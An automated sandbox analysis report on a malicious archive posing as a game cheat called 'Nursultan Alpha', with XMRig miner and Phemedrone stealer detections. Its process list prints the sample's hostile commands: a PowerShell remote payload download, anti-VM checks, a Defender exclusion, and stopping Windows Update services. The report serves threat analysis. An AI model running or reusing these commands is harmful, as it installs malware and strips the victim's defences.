Analysis Overview
SHA256
80b5ec95630e41ab434aa5173bf0e01d649c988c8a808f5c6dc9f5429ec6dea9
Threat Level: Known bad
The file Nursultan Alpha By Fleshk.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Phemedrone
XMRig Miner payload
Creates new service(s)
Drops file in Drivers directory
Stops running service(s)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Power Settings
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Hide Artifacts: Ignore Process Interrupts
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
Reported
2024-06-27 18:35
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-27 18:35
Reported
2024-06-27 18:38
Platform
win7-20240611-en
Max time kernel
146s
Max time network
142s
Command Line
Signatures
Phemedrone
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe | N/A |
| N/A | N/A | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1000 set thread context of 2888 | N/A | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | C:\Windows\system32\conhost.exe |
| PID 1000 set thread context of 2792 | N/A | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | C:\Windows\system32\svchost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5144E551-34B4-11EF-B477-E6415F422194} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0fd7aefc0c8da01 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\doskey.exe
doskey CD=RECOVER
C:\Windows\system32\doskey.exe
doskey TYPE=ROBOCOPY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\doskey.exe
doskey TITLE=RENAME
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\assets\UnRAR.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\assets\unrar.exe" x -p1512okul -o+ "C:\Users\Admin\AppData\Local\Temp\java.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe"
C:\Windows\system32\mshta.exe
mshta
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\rundll32.exe
rundll32
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2928 -s 1796
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "RLNALEWN"
C:\Windows\system32\sc.exe
